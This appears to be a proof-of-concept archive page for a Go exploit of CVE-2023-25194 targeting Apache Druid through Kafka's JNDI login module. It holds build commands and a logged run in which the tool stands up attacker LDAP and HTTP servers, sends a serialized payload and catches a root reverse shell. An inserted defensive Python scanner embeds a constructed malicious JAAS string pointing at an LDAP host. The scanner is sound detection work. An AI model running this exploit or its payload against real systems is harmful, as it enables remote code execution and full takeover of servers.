
POC details: f86eae8e8844f5e91f36c3610714feaef90e2e3a

Source
Related vulnerability
Title: Apache Kafka code issue vulnerability (CVE-2023-25194)
Description: Apache Kafka is an open-source distributed streaming platform from the Apache Software Foundation (USA). It ingests real-time data and is used to build applications that react in real time to changes in data streams. Apache Kafka Connect contains a code issue vulnerability. No further details on this vulnerability are available at present; follow CNNVD or the vendor's advisories.
Description
A go-exploit for Apache Druid CVE-2023-25194
Introduction
# Apache Druid CVE-2023-25194

CVE-2023-25194 is a deserialization vulnerability affecting Apache Kafka. This go-exploit demonstrates exploiting CVE-2023-25194 against Apache Druid (using Kafka). This type of attack typically requires an LDAP JNDI attacker infrastructure that is normally spread across a couple of tools. However, all of that is built into the go-exploit for ease of exploitation.
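A defender-side check, added here as an example and not taken from the go-exploit repository or this page: the public Apache advisory for CVE-2023-25194 describes the trigger as a connector or consumer `sasl.jaas.config` value naming `com.sun.security.auth.module.JndiLoginModule`, which points the worker at an external LDAP server of the kind this exploit stands up. That trigger is not stated on this page itself. The scanner below walks arbitrary nested JSON so it covers both Kafka Connect connector bodies and Druid Kafka supervisor specs; the Druid layout (`spec.ioConfig.consumerProperties`) and Connect's `consumer.override.` prefix come from my knowledge of those products, and the sample documents, including the 203.0.113.10 address, are constructed.

```python
"""
Added defensive example (not part of the go-exploit or this page's repository):
scan JSON documents submitted to a Kafka Connect or Druid ingestion API for a
`sasl.jaas.config` value that loads a JNDI-backed login module, the trigger the
public advisory gives for CVE-2023-25194. All sample documents are constructed.
"""
import json
import re
from typing import Any, Iterator

# Match the bare key and its prefixed forms (producer., consumer.override.,
# or a connector-specific prefix such as database.history.producer.).
_JAAS_KEY_RE = re.compile(r"(?:^|\.)sasl\.jaas\.config$")

# Login modules that resolve external references through JNDI.
_JNDI_MODULES = ("com.sun.security.auth.module.JndiLoginModule",)

# JNDI provider URLs a JAAS string may carry (extracted only for reporting).
_URL_RE = re.compile(r"(?:ldaps?|rmi|dns|iiop)://[^\s\"';]+", re.IGNORECASE)


def _walk(node: Any, path: str = "") -> Iterator[tuple[str, Any]]:
    """Yield (dotted path, value) for every leaf in a nested JSON structure."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _walk(value, f"{path}[{index}]")
    else:
        yield path, node


def find_jndi_jaas(document: dict, label: str = "<unnamed>") -> list[dict]:
    """Return one finding per sasl.jaas.config entry that names a JNDI login module."""
    findings = []
    for path, value in _walk(document):
        if not _JAAS_KEY_RE.search(path) or not isinstance(value, str):
            continue
        if any(module in value for module in _JNDI_MODULES):
            findings.append({"document": label, "path": path, "urls": _URL_RE.findall(value)})
    return findings


def scan_json_documents(documents: list[str]) -> list[dict]:
    """Parse each JSON string and collect findings, labelling by connector name or Druid dataSource."""
    findings = []
    for index, raw in enumerate(documents):
        doc = json.loads(raw)
        label = (doc.get("name")
                 or doc.get("spec", {}).get("dataSchema", {}).get("dataSource")
                 or f"document-{index}")
        findings.extend(find_jndi_jaas(doc, label))
    return findings


# Constructed samples: a benign Kafka Connect connector using PLAIN SASL, and a
# Druid Kafka supervisor spec whose consumer properties load the JNDI module.
SAMPLE_DOCUMENTS = [
    json.dumps({
        "name": "orders-sink",
        "config": {
            "connector.class": "org.apache.kafka.connect.file.FileStreamSinkConnector",
            "topics": "orders",
            "consumer.override.sasl.jaas.config":
                'org.apache.kafka.common.security.plain.PlainLoginModule required '
                'username="svc" password="placeholder";',
        },
    }),
    json.dumps({
        "type": "kafka",
        "spec": {
            "dataSchema": {"dataSource": "events"},
            "ioConfig": {
                "topic": "events",
                "consumerProperties": {
                    "bootstrap.servers": "kafka:9092",
                    "sasl.jaas.config":
                        'com.sun.security.auth.module.JndiLoginModule required '
                        'user.provider.url="ldap://203.0.113.10:10389/x";',
                },
            },
        },
    }),
]

if __name__ == "__main__":
    for finding in scan_json_documents(SAMPLE_DOCUMENTS):
        print(f"{finding['document']}: {finding['path']} -> {finding['urls']}")
```

Feed it connector bodies pulled from the Connect REST API, stored supervisor specs, or request logs. On Kafka 3.4.0 and later the client blocks `JndiLoginModule` by default through the `org.apache.kafka.disallowed.login.modules` system property, so the scan is mainly useful for spotting attempts against older clients and for auditing configs already on disk.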


## Compiling

To build the exploit into a docker image simply:

```sh
make docker
```

If you have a Go build environment handy, you can also just use `make`:

```sh
albinolobster@mournland:~/cve-2023-25194$ make
gofmt -d -w cve-2023-25194.go 
golangci-lint run --fix cve-2023-25194.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-25194_linux-arm64 cve-2023-25194.go
```

## Example Output

```sh
albinolobster@mournland:~/cve-2023-25194$ ./build/cve-2023-25194_linux-arm64 -c -e -rhost 10.9.49.88 -lhost 10.9.49.69 -lport 1270 -ldapAddr 10.9.49.69 -httpAddr 10.9.49.69
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Starting listener on 10.9.49.69:1270"
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.88 port=8888 ssl=false "ssl auto"=false
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.88 port=8888
time=2024-03-15T16:02:31.268-04:00 level=VERSION msg="The self-reported version is: 25.0.0" host=10.9.49.88 port=8888 version=25.0.0
time=2024-03-15T16:02:31.268-04:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.88 port=8888 vulnerable=yes
time=2024-03-15T16:02:31.268-04:00 level=STATUS msg="Starting LDAP server on 10.9.49.69:10389"
time=2024-03-15T16:02:33.271-04:00 level=STATUS msg="Starting HTTP Server on 10.9.49.69:8080"
time=2024-03-15T16:02:33.335-04:00 level=SUCCESS msg="Received a bind request!"
time=2024-03-15T16:02:33.343-04:00 level=SUCCESS msg="Serialized payload sent!"
time=2024-03-15T16:02:33.620-04:00 level=STATUS msg="Exploit completed"
time=2024-03-15T16:02:33.620-04:00 level=STATUS msg="Exploit successfully completed" exploited=true
time=2024-03-15T16:02:33.640-04:00 level=SUCCESS msg="Caught new shell from 10.9.49.88:58928"
time=2024-03-15T16:02:33.640-04:00 level=STATUS msg="Active shell from 10.9.49.88:58928"
bash: cannot set terminal process group (41): Inappropriate ioctl for device
bash: no job control in this shell
root@8e8d1ce79210:/opt/druid# id
id
uid=0(root) gid=0(root) groups=0(root)
root@8e8d1ce79210:/opt/druid# 
```
File snapshot

```
[4.0K] /data/pocs/f86eae8e8844f5e91f36c3610714feaef90e2e3a
├── [5.2K] cve-2023-25194.go
├── [ 466] Dockerfile
├── [1016] go.mod
├── [5.3K] go.sum
├── [ 11K] LICENSE
├── [2.1K] Makefile
└── [2.5K] README.md

0 directories, 7 files
```